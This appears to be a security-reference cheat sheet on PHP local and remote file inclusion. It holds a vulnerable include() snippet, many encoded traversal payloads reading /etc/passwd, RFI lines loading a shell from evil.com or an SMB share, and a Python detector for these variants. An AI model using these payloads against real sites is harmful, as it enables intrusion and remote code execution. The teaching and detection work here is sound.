File Inclusion
A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
Tools
- P0cL4bs/Kadimus (archived on Oct 7, 2020) - Kadimus is a tool to check for and exploit LFI vulnerabilities.
- D35m0nd142/LFISuite - Totally automatic LFI exploiter (+ reverse shell) and scanner.
- kurobeats/fimap - fimap is a small Python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web applications.
- lightos/Panoptic - Panoptic is an open source penetration testing tool that automates the search for and retrieval of common log and config files through path traversal vulnerabilities.
- hansmach1ne/LFImap - Local File Inclusion discovery and exploitation tool.
Local File Inclusion
A File Inclusion vulnerability should be differentiated from Path Traversal. A Path Traversal vulnerability lets an attacker read a file, usually by abusing a "reading" mechanism implemented in the target application, whereas File Inclusion leads to the execution of arbitrary code, because the included file is parsed and run by the interpreter.
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker can manipulate the page parameter to include local or remote files, leading to unauthorized access or code execution.
<?php
// Vulnerable by design: the user-controlled value reaches include() with no
// allow-list, no path normalization and no check that it stays inside the web root.
$file = $_GET['page'];
include($file);
?>
In the following examples we include the /etc/passwd file; check the Directory & Path Traversal chapter for more interesting files.
http://example.com/index.php?page=../../../etc/passwd
Null Byte
⚠️ In versions of PHP below 5.3.4 we can terminate the path with a null byte (%00).
http://example.com/index.php?page=../../../etc/passwd%00
Example: Joomla! Component Web TV 1.0 - CVE-2010-1470
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
Path Truncation
On most PHP installations a filename longer than 4096 bytes is truncated, so any excess characters are silently thrown away. This is what the padding at the end of the following payloads relies on.
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Remote File Inclusion
Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
Remote File Inclusion no longer works on a default configuration, because allow_url_include has been disabled by default since PHP 5. It requires the following php.ini setting:
allow_url_include = On
Most of the filter bypasses from LFI section can be reused for RFI.
http://example.com/index.php?page=http://evil.com/shell.txt
Null Byte
http://example.com/index.php?page=http://evil.com/shell.txt%00
Double Encoding
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
Bypass allow_url_include
When allow_url_include and allow_url_fopen are set to Off, it is still possible to include a remote file on a Windows box using the SMB protocol.
- Create a share open to everyone
- Write PHP code inside a file: shell.php
- Include it
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
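The LFI filter bypasses above (null byte, double encoding, overlong UTF-8, `....//`, `%5C`) and the RFI/SMB payloads all hide the same two signals, a `../` sequence or a remote location, behind encoding. The following added example (not code from the original page) shows how a detection rule should decode a request parameter before matching, so the variants listed on this page all collapse back to a recognizable form; the sample request paths are constructed from the payloads above and the parameter name `page` is assumed.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample request paths, built from the bypass variants listed on this page.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=../../../etc/passwd%00",
    "/index.php?page=%252e%252e%252fetc%252fpasswd",
    "/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
    "/index.php?page=....//....//etc/passwd",
    "/index.php?page=..///////..////..//////etc/passwd",
    "/index.php?page=/%5C../%5C../%5C../etc/passwd",
    "/index.php?page=http:%252f%252fevil.com%252fshell.txt",
    "/index.php?page=\\\\10.0.0.1\\share\\shell.php",
]

# A scheme followed by "//" (http://, stream wrappers) or a UNC-style //host/share.
REMOTE = re.compile(rb"^(?:[a-z][a-z0-9+.-]*://|//[^/.])", re.IGNORECASE)

def raw_param(request_path: str, name: str):
    """Return one query parameter still percent-encoded (parse_qs would decode it lossily)."""
    for pair in urlsplit(request_path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None

def normalize(value: str) -> bytes:
    """Undo the encodings an include() payload can hide behind."""
    raw = value.encode("latin-1", "replace")
    for _ in range(3):                          # %252e -> %2e -> '.' (double encoding)
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    raw = raw.replace(b"\xc0\xae", b".")        # overlong UTF-8 form of '.'
    raw = raw.replace(b"\x00", b"")             # null byte (truncation on PHP < 5.3.4)
    return raw.replace(b"\\", b"/")             # %5C and Windows separators

def classify(value: str) -> str:
    """Label an include parameter: 'remote', 'traversal', 'absolute' or 'clean'."""
    norm = normalize(value)
    if REMOTE.match(norm):                      # checked before slash collapsing keeps //host
        return "remote"
    norm = re.sub(rb"/+", b"/", norm)           # ..///..//// -> ../../ ; ....// still holds ../
    if b"../" in norm or norm.endswith(b"/..") or norm == b"..":
        return "traversal"
    return "absolute" if norm.startswith(b"/") else "clean"

def scan(requests, param="page"):
    """Return (request, label) for every request whose include parameter is not clean."""
    hits = []
    for req in requests:
        value = raw_param(req, param)
        if value is not None and classify(value) != "clean":
            hits.append((req, classify(value)))
    return hits
```

Running `scan(SAMPLE_REQUESTS)` flags every constructed request except the plain `page=about` one; the same decode-then-match order is what an allow-list check in the application itself should follow before touching the filesystem.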
Labs
- Root Me - Local File Inclusion
- Root Me - Local File Inclusion - Double encoding
- Root Me - Remote File Inclusion
- Root Me - PHP - Filters
References
- CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018
- Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12
- Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015
- LFI Cheat Sheet - @Arr0way - 24 Apr 2016
- Testing for Local File Inclusion - OWASP - 25 June 2017
- Turning LFI into RFI - Grayson Christopher - 2017-08-14